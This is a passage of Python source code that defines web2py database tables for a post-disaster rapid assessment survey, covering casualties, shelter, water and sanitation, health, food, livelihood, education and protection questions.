label = T("Number/Percentage of affected population that is Female & Aged 61+")),
Field("dead_women", "integer",
label = T("How many Women (18 yrs+) are Dead due to the crisis"),
comment = T("people")), # @ToDo: Should this say "Number of people"?
Field("dead_men", "integer",
label = T("How many Men (18 yrs+) are Dead due to the crisis"),
comment = T("people")),
Field("dead_girl", "integer",
label = T("How many Girls (0-17 yrs) are Dead due to the crisis"),
comment = T("people")),
Field("dead_boy", "integer",
label = T("How many Boys (0-17 yrs) are Dead due to the crisis"),
comment = T("people")),
Field("injured_women", "integer",
label = T("How many Women (18 yrs+) are Injured due to the crisis"),
comment = T("people")),
Field("injured_men", "integer",
label = T("How many Men (18 yrs+) are Injured due to the crisis"),
comment = T("people")),
Field("injured_girl", "integer",
label = T("How many Girls (0-17 yrs) are Injured due to the crisis"),
comment = T("people")),
Field("injured_boy", "integer",
label = T("How many Boys (0-17 yrs) are Injured due to the crisis"),
comment = T("people")),
Field("missing_women", "integer",
label = T("How many Women (18 yrs+) are Missing due to the crisis"),
comment = T("people")),
Field("missing_men", "integer",
label = T("How many Men (18 yrs+) are Missing due to the crisis"),
comment = T("people")),
Field("missing_girl", "integer",
label = T("How many Girls (0-17 yrs) are Missing due to the crisis"),
comment = T("people")),
Field("missing_boy", "integer",
label = T("How many Boys (0-17 yrs) are Missing due to the crisis"),
comment = T("people")),
Field("household_head_elderly", "integer",
label = T("Elderly person headed households (>60 yrs)"),
comment = T("households")),
Field("household_head_female", "integer",
label = T("Female headed households"),
comment = T("households")),
Field("household_head_child", "integer",
label = T("Child headed households (<18 yrs)"),
comment = T("households")),
Field("disabled_physical", "integer",
label = T("Persons with disability (physical)"),
comment = T("people")),
Field("disabled_mental", "integer",
label = T("Persons with disability (mental)"),
comment = T("people")),
Field("pregnant", "integer",
label = T("Pregnant women"),
comment = T("people")),
Field("lactating", "integer",
label = T("Lactating women"),
comment = T("people")),
Field("minorities", "integer",
label = T("Migrants or ethnic minorities"),
comment = T("people")),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = rat_section_crud_strings
configure(tablename, deletable=False)
# Section 3: Shelter & Essential NFIs -------------------------------------
rat_houses_salvmat_types = {
1: T("Wooden plank"),
2: T("Zinc roof"),
3: T("Bricks"),
4: T("Wooden poles"),
5: T("Door frame"),
6: T("Window frame"),
7: T("Roof tile"),
999: NOT_APPLICABLE
}
rat_water_container_types = {
1: T("Jerry can"),
2: T("Bucket"),
3: T("Water gallon"),
99: T("Other (specify)")
}
tablename = "assess_section3"
define_table(tablename,
assessment_id(),
Field("houses_total", "integer",
label = T("Total number of houses in the area"),
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 99999999)),
),
Field("houses_destroyed", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 99999999)),
**rat_label_and_tooltip(
"Number of houses destroyed/uninhabitable",
"How many houses are uninhabitable (uninhabitable = foundation and structure destroyed)?")),
Field("houses_damaged", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 99999999)),
**rat_label_and_tooltip(
"Number of houses damaged, but usable",
"How many houses suffered damage but remain usable (usable = windows broken, cracks in walls, roof slightly damaged)?")),
Field("houses_salvmat", "list:integer",
requires = IS_NULL_OR(IS_IN_SET(rat_houses_salvmat_types,
multiple=True,
zero=None)),
represent = lambda opt, set=rat_houses_salvmat_types: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Salvage material usable from destroyed houses",
"What type of salvage material can be used from destroyed houses?",
multiple=True)),
Field("water_containers_available", "boolean",
**rat_label_and_tooltip(
"Water storage containers available for HH",
"Do households have household water storage containers?")),
Field("water_containers_sufficient", "boolean",
**rat_label_and_tooltip(
"Water storage containers sufficient per HH",
"Do households each have at least 2 containers (10-20 litres each) to hold water?")),
Field("water_containers_types", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_water_container_types,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_water_container_types: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Types of water storage containers available",
"What types of household water storage containers are available?",
multiple=True)),
Field("water_containers_types_other",
label = T("Other types of water storage containers")),
Field("cooking_equipment_available", "boolean",
**rat_label_and_tooltip(
"Appropriate cooking equipment/materials in HH",
"Do households have appropriate equipment and materials to cook their food (stove, pots, dished plates, and a mug/drinking vessel, etc)?")),
Field("sanitation_items_available", "boolean",
**rat_label_and_tooltip(
"Reliable access to sanitation/hygiene items",
"Do people have reliable access to sufficient sanitation/hygiene items (bathing soap, laundry soap, shampoo, toothpaste and toothbrush)?")),
Field("sanitation_items_available_women", "boolean",
**rat_label_and_tooltip(
"Easy access to sanitation items for women/girls",
"Do women and girls have easy access to sanitary materials?")),
Field("bedding_materials_available", "boolean",
**rat_label_and_tooltip(
"Bedding materials available",
"Do households have bedding materials available (tarps, plastic mats, blankets)?")),
Field("clothing_sets_available", "boolean",
**rat_label_and_tooltip(
"Appropriate clothing available",
"Do people have at least 2 full sets of clothing (shirts, pants/sarong, underwear)?")),
Field("nfi_assistance_available", "boolean",
**rat_label_and_tooltip(
"Shelter/NFI assistance received/expected",
"Have households received any shelter/NFI assistance or is assistance expected in the coming days?")),
Field("kits_hygiene_received", "boolean",
label = T("Hygiene kits received")),
Field("kits_hygiene_source",
label = T("Hygiene kits, source")),
Field("kits_household_received", "boolean",
label = T("Household kits received")),
Field("kits_household_source",
label = T("Household kits, source")),
Field("kits_dwelling_received", "boolean",
label = T("Family tarpaulins received")), # @ToDo: Better label, perhaps? A tarp isn't a dwelling.
Field("kits_dwelling_source",
label = T("Family tarpaulins, source")),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = rat_section_crud_strings
configure(tablename, deletable=False)
# Section 4 - Water and Sanitation ----------------------------------------
rat_water_source_types = {
1: T("PDAM"),
2: T("Dug Well"),
3: T("Spring"),
4: T("River"),
5: T("Other Faucet/Piped Water"),
99: T("Other (describe)"),
999: NOT_APPLICABLE
}
rat_water_coll_person_opts = {
1: T("Child"),
2: T("Adult male"),
3: T("Adult female"),
4: T("Older person (>60 yrs)"),
999: NOT_APPLICABLE
}
rat_defec_place_types = {
1: T("open defecation"),
2: T("pit"),
3: T("latrines"),
4: T("river"),
99: T("other")
}
rat_defec_place_animals_opts = {
1: T("enclosed area"),
2: T("within human habitat"),
999: NOT_APPLICABLE
}
rat_latrine_types = {
1: T("flush latrine with septic tank"),
2: T("pit latrine"),
999: NOT_APPLICABLE
}
tablename = "assess_section4"
define_table(tablename,
assessment_id(),
Field("water_source_pre_disaster_type", "integer",
label = T("Type of water source before the disaster"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_water_source_types,
zero=None)),
represent = lambda opt: rat_water_source_types.get(opt,
UNKNOWN_OPT)),
Field("water_source_pre_disaster_description",
label = T("Description of water source before the disaster")),
Field("dwater_source_type", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_water_source_types,
zero=None)),
represent = lambda opt: rat_water_source_types.get(opt,
UNKNOWN_OPT),
**rat_label_and_tooltip(
"Current type of source for drinking water",
"What is your major source of drinking water?")),
Field("dwater_source_description",
label = T("Description of drinking water source")),
Field("dwater_reserve",
**rat_label_and_tooltip(
"How long will this water resource last?",
"Specify the minimum sustainability in weeks or days.")),
Field("swater_source_type", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_water_source_types,
zero=None)),
represent = lambda opt: rat_water_source_types.get(opt,
UNKNOWN_OPT),
**rat_label_and_tooltip(
"Current type of source for sanitary water",
"What is your major source of clean water for daily use (ex: washing, cooking, bathing)?")),
Field("swater_source_description",
label = T("Description of sanitary water source")),
Field("swater_reserve",
**rat_label_and_tooltip(
"How long will this water resource last?",
"Specify the minimum sustainability in weeks or days.")),
Field("water_coll_time", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_walking_time_opts,
zero=None)),
represent = lambda opt: rat_walking_time_opts.get(opt,
UNKNOWN_OPT),
**rat_label_and_tooltip(
"Time needed to collect water",
"How long does it take you to reach the available water resources? Specify the time required to go there and back, including queuing time, by foot.")),
Field("water_coll_safe", "boolean",
label = T("Is it safe to collect water?"),
default = True),
Field("water_coll_safety_problems",
label = T("If no, specify why")),
Field("water_coll_person", "integer",
label = T("Who usually collects water for the family?"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_water_coll_person_opts,
zero=None)),
represent = lambda opt: rat_water_coll_person_opts.get(opt,
UNKNOWN_OPT)),
Field("defec_place_type",
requires = IS_EMPTY_OR(IS_IN_SET(rat_defec_place_types,
zero=None,
multiple=True)),
represent = lambda opt: rat_defec_place_types.get(opt,
UNKNOWN_OPT),
**rat_label_and_tooltip(
"Type of place for defecation",
"Where do the majority of people defecate?",
multiple=True)),
Field("defec_place_description",
label = T("Description of defecation area")),
Field("defec_place_distance", "integer",
label = T("Distance between defecation area and water source"),
comment = T("meters")),
Field("defec_place_animals", "integer",
label = T("Defecation area for animals"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_defec_place_animals_opts,
zero = None)),
represent = lambda opt: rat_defec_place_animals_opts.get(opt,
UNKNOWN_OPT)),
Field("close_industry", "boolean",
**rat_label_and_tooltip(
"Industry close to village/camp",
"Is there any industrial or agro-chemical production close to the affected area/village?")),
Field("waste_disposal",
**rat_label_and_tooltip(
"Place for solid waste disposal",
"Where is solid waste disposed in the village/camp?")),
Field("latrines_number", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of latrines",
"How many latrines are available in the village/IDP centre/Camp?")),
Field("latrines_type", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_latrine_types,
zero=None)),
represent = lambda opt: rat_latrine_types.get(opt,
UNKNOWN_OPT),
**rat_label_and_tooltip(
"Type of latrines",
"What type of latrines are available in the village/IDP centre/Camp?")),
Field("latrines_separation", "boolean",
**rat_label_and_tooltip(
"Separate latrines for women and men",
"Are there separate latrines for women and men available?")),
Field("latrines_distance", "integer",
**rat_label_and_tooltip(
"Distance between shelter and latrines",
"Distance between latrines and temporary shelter in meters")),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = rat_section_crud_strings
configure(tablename, deletable=False)
# Section 5 - Health ------------------------------------------------------
rat_health_services_types = {
1: T("Community Health Center"),
2: T("Hospital")
}
rat_health_problems_opts = {
1: T("Respiratory Infections"),
2: T("Diarrhea"),
3: T("Dehydration"),
99: T("Other (specify)")
}
rat_infant_nutrition_alternative_opts = {
1: T("Porridge"),
2: T("Banana"),
3: T("Instant Porridge"),
4: T("Air tajin"),
99: T("Other (specify)")
}
tablename = "assess_section5"
define_table(tablename,
assessment_id(),
Field("health_services_pre_disaster", "boolean",
**rat_label_and_tooltip(
"Health services functioning prior to disaster",
"Were there health services functioning for the community prior to the disaster?")),
Field("medical_supplies_pre_disaster", "boolean",
**rat_label_and_tooltip(
"Basic medical supplies available prior to disaster",
"Were basic medical supplies available for health services prior to the disaster?")),
Field("health_services_post_disaster", "boolean",
**rat_label_and_tooltip(
"Health services functioning since disaster",
"Are there health services functioning for the community since the disaster?")),
Field("medical_supplies_post_disaster", "boolean",
**rat_label_and_tooltip(
"Basic medical supplies available since disaster",
"Are basic medical supplies available for health services since the disaster?")),
Field("medical_supplies_reserve", "integer",
label = T("How many days will the supplies last?")),
Field("health_services_available_types", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_health_services_types,
zero=None, multiple=True)),
represent = lambda opt: \
rat_represent_multiple(rat_health_services_types, opt),
**rat_label_and_tooltip(
"Types of health services available",
"What types of health services are still functioning in the affected area?",
multiple=True)),
Field("staff_number_doctors", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of doctors actively working",
"How many doctors in the health centers are still actively working?")),
Field("staff_number_nurses", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of nurses actively working",
"How many nurses in the health centers are still actively working?")),
Field("staff_number_midwives", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of midwives actively working",
"How many midwives in the health centers are still actively working?")),
Field("health_service_walking_time", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_walking_time_opts,
zero=None)),
represent = lambda opt: rat_walking_time_opts.get(opt,
UNKNOWN_OPT),
**rat_label_and_tooltip(
"Walking time to the health service",
"How long does it take you to walk to the health service?")),
Field("health_problems_adults", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_health_problems_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_health_problems_opts: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Current type of health problems, adults",
"What types of health problems do people currently have?",
multiple=True)),
Field("health_problems_adults_other",
label = T("Other current health problems, adults")),
Field("health_problems_children", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_health_problems_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_health_problems_opts: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Current type of health problems, children",
"What types of health problems do children currently have?",
multiple=True)),
Field("health_problems_children_other",
label = T("Other current health problems, children")),
Field("chronical_illness_cases", "boolean", # @ToDo: "chronic illness"?
**rat_label_and_tooltip(
"People with chronical illnesses",
"Are there people with chronical illnesses in your community?")),
Field("chronical_illness_children", "boolean",
**rat_label_and_tooltip(
"Children with chronical illnesses",
"Are there children with chronical illnesses in your community?")),
Field("chronical_illness_elderly", "boolean",
**rat_label_and_tooltip(
"Older people with chronical illnesses",
"Are there older people with chronical illnesses in your community?")),
Field("chronical_care_sufficient", "boolean",
**rat_label_and_tooltip(
"Sufficient care/assistance for chronically ill",
"Are the chronically ill receiving sufficient care and assistance?")),
Field("malnutrition_present_pre_disaster", "boolean",
**rat_label_and_tooltip(
"Malnutrition present prior to disaster",
"Were there cases of malnutrition in this area prior to the disaster?")),
Field("mmd_present_pre_disaster", "boolean",
**rat_label_and_tooltip(
"Micronutrient malnutrition prior to disaster",
"Were there reports or evidence of outbreaks of any micronutrient malnutrition disorders before the emergency?")),
Field("breast_milk_substitutes_pre_disaster", "boolean",
**rat_label_and_tooltip(
"Breast milk substitutes used prior to disaster",
"Were breast milk substitutes used prior to the disaster?")),
Field("breast_milk_substitutes_post_disaster", "boolean",
**rat_label_and_tooltip(
"Breast milk substitutes in use since disaster",
"Are breast milk substitutes being used here since the disaster?")),
Field("infant_nutrition_alternative", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_infant_nutrition_alternative_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_infant_nutrition_alternative_opts: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Alternative infant nutrition in use",
"Babies who are not being breastfed, what are they being fed on?",
multiple=True)),
Field("infant_nutrition_alternative_other",
label = T("Other alternative infant nutrition in use")),
Field("u5_diarrhea", "boolean",
**rat_label_and_tooltip(
"Diarrhea among children under 5",
"Are there cases of diarrhea among children under the age of 5?")),
Field("u5_diarrhea_rate_48h", "integer",
**rat_label_and_tooltip(
"Approx. number of cases/48h",
"Approximately how many children under 5 with diarrhea in the past 48 hours?")),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = rat_section_crud_strings
configure(tablename, deletable=False)
# Section 6 - Nutrition/Food Security -------------------------------------
rat_main_dish_types = {
1: T("Rice"),
2: T("Noodles"),
3: T("Biscuits"),
4: T("Corn"),
5: T("Wheat"),
6: T("Cassava"),
7: T("Cooking Oil")
}
rat_side_dish_types = {
1: T("Salted Fish"),
2: T("Canned Fish"),
3: T("Chicken"),
4: T("Eggs"),
99: T("Other (specify)")
}
rat_food_stock_reserve_opts = {
1: T("1-3 days"),
2: T("4-7 days"),
3: T("8-14 days")
}
rat_food_source_types = {
1: "Local market",
2: "Field cultivation",
3: "Food stall",
4: "Animal husbandry",
5: "Raising poultry",
99: "Other (specify)"
}
tablename = "assess_section6"
define_table(tablename,
assessment_id(),
Field("food_stocks_main_dishes", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_main_dish_types,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_main_dish_types: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Existing food stocks, main dishes",
"What food stocks exist? (main dishes)",
multiple=True)),
# @ToDo: Should there be a field "food_stocks_other_main_dishes"?
Field("food_stocks_side_dishes", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_side_dish_types,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_side_dish_types: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Existing food stocks, side dishes",
"What food stocks exist? (side dishes)",
multiple=True)),
Field("food_stocks_other_side_dishes",
label = T("Other side dishes in stock")),
Field("food_stocks_reserve", "integer",
label = T("How long will the food last?"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_food_stock_reserve_opts,
zero=None)),
represent = lambda opt: rat_food_stock_reserve_opts.get(opt,
UNKNOWN_OPT)),
Field("food_sources", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_food_source_types,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_food_source_types: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Usual food sources in the area",
"What are the people's normal ways to obtain food in this area?",
multiple=True)),
Field("food_sources_other",
label = T("Other ways to obtain food")),
Field("food_sources_disruption", "boolean",
**rat_label_and_tooltip(
"Normal food sources disrupted",
"Have normal food sources been disrupted?")),
Field("food_sources_disruption_details",
label = T("If yes, which and how")),
Field("food_assistance_available", "boolean",
**rat_label_and_tooltip(
"Food assistance available/expected",
"Have the people received or are you expecting any medical or food assistance in the coming days?")),
Field("food_assistance_details", "text",
label = T("If yes, specify what and by whom")),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = rat_section_crud_strings
configure(tablename, deletable=False)
# Section 7 - Livelihood --------------------------------------------------
rat_income_source_opts = {
1: T("Agriculture"),
2: T("Fishing"),
3: T("Poultry"),
4: T("Casual Labor"),
5: T("Small Trade"),
6: T("Other")
}
rat_expense_types = {
1: T("Education"),
2: T("Health"),
3: T("Food"),
4: T("Hygiene"),
5: T("Shelter"),
6: T("Clothing"),
7: T("Funeral"),
8: T("Alcohol"),
99: T("Other (specify)")
}
rat_cash_source_opts = {
1: T("Family/friends"),
2: T("Government"),
3: T("Bank/micro finance"),
4: T("Humanitarian NGO"),
99: T("Other (specify)")
}
rat_ranking_opts = xrange(1, 7)
tablename = "assess_section7"
define_table(tablename,
assessment_id(),
Field("income_sources_pre_disaster", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_income_source_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_income_source_opts: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Main income sources before disaster",
"What were your main sources of income before the disaster?",
multiple=True)),
Field("income_sources_post_disaster", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_income_source_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_income_source_opts: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Current main income sources",
"What are your main sources of income now?",
multiple=True)),
Field("main_expenses", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_expense_types,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_expense_types: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Current major expenses",
"What do you spend most of your income on now?",
multiple=True)),
Field("main_expenses_other",
label = T("Other major expenses")),
Field("business_damaged", "boolean",
**rat_label_and_tooltip(
"Business damaged",
"Has your business been damaged in the course of the disaster?")),
Field("business_cash_available", "boolean",
**rat_label_and_tooltip(
"Cash available to restart business",
"Do you have access to cash to restart your business?")),
Field("business_cash_source", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_cash_source_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_cash_source_opts: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Main cash source",
"What are your main sources of cash to restart your business?")),
Field("rank_reconstruction_assistance", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_ranking_opts, zero=None)),
**rat_label_and_tooltip(
"Immediate reconstruction assistance, Rank",
"Assistance for immediate repair/reconstruction of houses")),
Field("rank_farmland_fishing_assistance", "integer",
label = T("Farmland/fishing material assistance, Rank"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_ranking_opts, zero=None))),
Field("rank_poultry_restocking", "integer",
label = T("Poultry restocking, Rank"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_ranking_opts, zero=None))),
Field("rank_health_care_assistance", "integer",
label = T("Health care assistance, Rank"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_ranking_opts, zero=None))),
Field("rank_transportation_assistance", "integer",
label = T("Transportation assistance, Rank"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_ranking_opts, zero=None))),
Field("other_assistance_needed",
label = T("Other assistance needed")),
Field("rank_other_assistance", "integer",
label = T("Other assistance, Rank"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_ranking_opts, zero=None))),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = rat_section_crud_strings
configure(tablename, deletable=False)
# Section 8 - Education ---------------------------------------------------
rat_schools_salvmat_types = {
1: T("Wooden plank"),
2: T("Zinc roof"),
3: T("Bricks"),
4: T("Wooden poles"),
5: T("Door frame"),
6: T("Window frame"),
7: T("Roof tile"),
999: NOT_APPLICABLE
}
rat_alternative_study_places = {
1: T("Community Centre"),
2: T("Church"),
3: T("Mosque"),
4: T("Open area"),
5: T("Government building"),
6: T("Other (specify)"),
999: NOT_APPLICABLE
}
rat_school_attendance_barriers_opts = {
1: T("School used for other purpose"),
2: T("School destroyed"),
3: T("Lack of school uniform"),
4: T("Lack of transport to school"),
5: T("Children not enrolled in new school"),
6: T("School heavily damaged"),
7: T("Desire to remain with family"),
8: T("Lack of supplies at school"),
9: T("Displaced"),
10: T("Other (specify)"),
999: NOT_APPLICABLE
}
tablename = "assess_section8"
define_table(tablename,
assessment_id(),
Field("schools_total", "integer",
label = T("Total number of schools in affected area"),
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999))),
Field("schools_public", "integer",
label = T("Number of public schools"),
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999))),
Field("schools_private", "integer",
label = T("Number of private schools"),
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999))),
Field("schools_religious", "integer",
label = T("Number of religious schools"),
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999))),
Field("schools_destroyed", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of schools destroyed/uninhabitable",
"uninhabitable = foundation and structure destroyed")),
Field("schools_damaged", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of schools damaged but usable",
"windows broken, cracks in walls, roof slightly damaged")),
Field("schools_salvmat", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_schools_salvmat_types,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_schools_salvmat_types: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Salvage material usable from destroyed schools",
"What type of salvage material can be used from destroyed schools?",
multiple=True)),
Field("alternative_study_places_available", "boolean",
**rat_label_and_tooltip(
"Alternative places for studying available",
"Are there alternative places for studying?")),
Field("alternative_study_places_number", "integer",
label = T("Number of alternative places for studying"),
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999))),
Field("alternative_study_places", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_alternative_study_places,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_alternative_study_places: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Alternative places for studying",
"Where are the alternative places for studying?",
multiple=True)),
Field("alternative_study_places_other",
label = T("Other alternative places for study")),
Field("schools_open_pre_disaster", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of schools open before disaster",
"How many primary/secondary schools were opening prior to the disaster?")),
Field("schools_open_post_disaster", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of schools open now",
"How many of the primary/secondary schools are now open and running a regular schedule of class?")),
Field("teachers_active_pre_disaster", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of teachers before disaster",
"How many teachers worked in the schools prior to the disaster?")),
Field("teachers_affected_by_disaster", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Number of teachers affected by disaster",
"How many teachers have been affected by the disaster (affected = unable to work)?")),
Field("children_0612_female", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Girls 6-12 yrs in affected area",
"How many primary school age girls (6-12) are in the affected area?")),
Field("children_0612_male", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Boys 6-12 yrs in affected area",
"How many primary school age boys (6-12) are in the affected area?")),
Field("children_0612_not_in_school_female", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Girls 6-12 yrs not attending school",
"How many of the primary school age girls (6-12) in the area are not attending school?")),
Field("children_0612_not_in_school_male", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Boys 6-12 yrs not attending school",
"How many of the primary school age boys (6-12) in the area are not attending school?")),
Field("children_1318_female", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Girls 13-18 yrs in affected area",
"How many secondary school age girls (13-18) are in the affected area?")),
Field("children_1318_male", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Boys 13-18 yrs in affected area",
"How many secondary school age boys (13-18) are in the affected area?")),
Field("children_1318_not_in_school_female", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Girls 13-18 yrs not attending school",
"How many of the secondary school age girls (13-18) in the area are not attending school?")),
Field("children_1318_not_in_school_male", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(0, 999999)),
**rat_label_and_tooltip(
"Boys 13-18 yrs not attending school",
"How many of the secondary school age boys (13-18) in the area are not attending school?")),
Field("school_attendance_barriers", "list:integer",
requires = IS_EMPTY_OR(IS_IN_SET(rat_school_attendance_barriers_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_school_attendance_barriers_opts: \
rat_represent_multiple(set, opt),
**rat_label_and_tooltip(
"Factors affecting school attendance",
"What are the factors affecting school attendance?",
multiple=True)),
Field("school_attendance_barriers_other",
label = T("Other factors affecting school attendance")),
Field("school_assistance_available", "boolean",
**rat_label_and_tooltip(
"School assistance received/expected",
"Have schools received or are expecting to receive any assistance?")),
Field("school_assistance_tents_available", "boolean",
label = T("School tents received")),
Field("school_assistence_tents_source",
label = T("School tents, source")),
Field("school_assistance_materials_available", "boolean",
label = T("Education materials received")),
Field("school_assistance_materials_source",
label = T("Education materials, source")),
Field("school_assistance_other_available", "boolean",
label = T("Other school assistance received")),
Field("school_assistance_other",
label = T("Other school assistance, details")),
Field("school_assistance_other_source",
label = T("Other school assistance, source")),
s3_comments(),
*s3_meta_fields())
# @ToDo: onvalidation!
# CRUD strings
crud_strings[tablename] = rat_section_crud_strings
configure(tablename, deletable=False)
# Section 9 - Protection --------------------------------------------------
rat_fuzzy_quantity_opts = {
1: T("None"),
2: T("Few"),
3: T("Some"),
4: T("Many")
}
rat_quantity_opts = {
1: "1-10",
2: "11-50",
3: "51-100",
4: "100+"
}
rat_child_activity_opts = {
1: T("Playing"),
2: T("Domestic chores"),
3: T("School/studying"),
4: T("Doing nothing (no structured activity)"),
5: T("Working or other to provide money/food"),
99: T("Other (specify)")
}
rat_child_activity_post_disaster_opts = rat_child_activity_opts.copy()
rat_child_activity_post_disaster_opts.update({
6: T("Disaster clean-up/repairs")
})
tablename = "assess_section9"
define_table(tablename,
assessment_id(),
Field("vulnerable_groups_safe_env", "boolean",
label = T("Safe environment for vulnerable groups"),
comment = rat_tooltip("Are the areas that children, older people, and people with disabilities live in, play in and walk through on a daily basis physically safe?")),
Field("safety_children_women_affected", "boolean",
label = T("Safety of children and women affected by disaster?"),
comment = rat_tooltip("Has the safety and security of women and children in your community changed since the emergency?")),
Field("sec_incidents", "boolean",
label = T("Known incidents of violence since disaster"),
comment = rat_tooltip("Do you know of any incidents of violence?")),
Field("sec_incidents_gbv", "boolean",
label = T("Known incidents of violence against women/girls"),
comment = rat_tooltip("Without mentioning any names or indicating anyone, do you know of any incidents of violence against women or girls occuring since the disaster?")),
Field("sec_current_needs",
label = T("Needs to reduce vulnerability to violence"),
comment = rat_tooltip("What should be done to reduce women and children's vulnerability to violence?")),
Field("children_separated", "integer",
label = T("Children separated from their parents/caregivers"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_fuzzy_quantity_opts,
zero=None)),
represent = lambda opt: rat_fuzzy_quantity_opts.get(opt,
UNKNOWN_OPT),
comment = rat_tooltip("Do you know of children separated from their parents or caregivers?")),
Field("children_separated_origin",
label = T("Origin of the separated children"),
comment = rat_tooltip("Where are the separated children originally from?")),
Field("children_missing", "integer",
label = T("Parents/Caregivers missing children"),
